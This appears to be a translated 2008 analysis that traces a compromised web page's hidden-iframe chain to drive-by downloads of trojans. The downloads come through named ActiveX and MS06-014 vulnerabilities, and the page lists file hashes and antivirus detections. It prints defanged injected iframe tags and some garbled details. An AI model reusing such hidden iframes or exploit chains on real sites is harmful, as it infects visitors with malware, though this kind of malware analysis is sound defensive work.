A Power Information Network Trojan worm. win32.autorun, Trojan-Downloader.Win32.Losabel

A Power Information Network Trojan worm. win32.autorun, Trojan-Downloader.Win32.Losabel

EndurerOriginal
2008-05-28 th1Version

Webpage code:
/---
<IFRAME src = hxxp: // C ** 5.*5 * I *** 6.us/ c5.htm? 8888 width = 0 H'>
<IFRAME src = "hxxp: // 125.*64.*92. * 56/iisstart.htm" width = "100" Height = "0"> </iframe>
---/

#1 hxxp: // C ** 5.*5 * I *** 6.us/ c5.htm? 8888 content:
/---
<IFRAME src = hxxp: // www. * 36 ** 0C * 36*0. ***. CN/100.htm width = 0 Height = 0> </iframe>
---/

#1.1 hxxp: // www. * 36 ** 0C * 36*0. ***. CN/100.htm contains the Code:
/---
<IFRAME Style = display: None src = "hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/u.html "> </iframe>
---/

#1.1.1 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/u.html output code:
/---
<SCRIPT src00001.gif> </SCRIPT>
<IFRAME width = 100 Height = 0 src00006.gif> </iframe>
<IFRAME width = 100 Height = 0 src00005.gif> </iframe>
<IFRAME width = 100 Height = 0 src1_3.gif> </iframe>
<IFRAME width = 100 Height = 0 src1_2.gif> </iframe>
<IFRAME width = 100 Height = 0 src00007.gif> </iframe>
<IFRAME width = 100 Height = 0 src00004.gif> </iframe>
---/

#1.1.1.1 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/1.gif

Download hxxp: // www. * 36 ** 0a * 36*0. *. CN/D/614.exe with MS06-014 Vulnerability

File Description: D:/test/614.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 18:14:48
Modified on: 18:14:49
Access time: 18:15:15
Size: 15180 bytes, 14.844 KB
MD5: f30fd225bfae1c1ef6a349d8fd078a06
Sha1: 09b2f964291b216de0fe69416c43eff00a94b1d9
CRC32: 50053f7c

Kaspersky reports worm. win32.autorun. DNV

#1.1.1.2 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/2.gif

Download hxxp: // www. * 36 ** 0a * 36*0. **. CN/D/r11.exe by using the RealPlayer (ierpctl. ierpctl.1) Vulnerability
R11.exe and 614.exe

#1.1.1.3 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/3.gif

Use the storm video (MPs. stormplayer.1) vulnerability to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/bf.exe,
Bf.exe and 614.exe

#1.1.1.4 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/4.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/pps.exe with the PPStream (powerplayer. powerplayerctrl.1, CLSID: Taobao) Vulnerability
Pps.exe and 614.exe

#1.1.1.5 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/5.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/lz.exe using the vulnerability glchat. glchatctrl.1, CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20.
Lz.exe and 614.exe

#1.1.1.6 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/6.gif

Use the thunder (dpclient. VOD, CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F) vulnerability to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/xl.exe
Xl.exe and 614.exe

#1.1.1.7 hxxp: // www. * 36 ** 0a * 36*0. ***. CN/W/7.gif

Download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/r11.exe by using the RealPlayer (ierpctl. ierpctl.1, CLSID: alias) Vulnerability
R11.exe and 614.exe

#1.1.1.8 use baidubar. tool to download hxxp: // www. * 36 ** 0a * 36*0. ***. CN/D/Ad. Cab, which contains ad.exe and 614.exe

#2 hxxp: // 125.*64.*92. * 56/iisstart.htm contains the Code:
/---
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/XX/am1.htm? 12-8888 "width =" 100 "Height =" 0 "> </iframe>
---/

#2.1 hxxp: // D ***. So *** R *** ryl *. Biz/XX/am1.htm? 12-8888 include/output code:
/---
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/ax14.htm" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // D ***. So *** R *** ryl *. Biz/re10.htm" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // www. To ** ngji ** 12 ** 3.org/axfs.htm" width = 100 Height = 0> </iframe>
<IFRAME Style = display: None src = "hxxp: // D ***. So *** R *** ryl *. Biz/axlz.htm"> </iframe>
<IFRAME Style = display: None src = "hxxp: // D ***. So *** R *** ryl *. Biz/re11.htm"> </iframe>
---/

#2.1.1 hxxp: // D ***. So *** R *** ryl *. Biz/ax14.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe with MS06-014 Vulnerability

File Description: D:/test/soc.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 18:14:50
Modified on: 18:14:53
Access time: 18:15:15
Size: 22336 bytes, 21.832 KB
MD5: d06728a40f94710ad45415cc43f58d0d
Sha1: 3366fb9041b8186bf0381711b1bc3aaeabfd609a
CRC32: e7d1a119

Kaspersky report:Trojan-Downloader.Win32.Losabel.nx

#2.1.2 hxxp: // D ***. So *** R *** ryl *. Biz/re10.htm

Use the RealPlayer vulnerability to download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe

#2.1.3 hxxp: // www. To ** ngji ** 12 ** 3.org/axfs.htm
/---
File does not exist
---/

#2.1.4 hxxp: // D ***. So *** R *** ryl *. Biz/axlz.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe by exploiting the world gliedown. iedown.1, CLSID: F917534D-535B-416B-8E8F-0C04756C31A8 Vulnerability

#2.1.5 hxxp: // D ***. So *** R *** ryl *. Biz/re11.htm

Download hxxp: // www. To ** ngji ** 12 ** 3.org/soc.exe using the RealPlayer (ierpctl. ierpctl.1, CLSID: 2f542a2e-edc9-4bf7-8cb1-87c9919f7f93) Vulnerability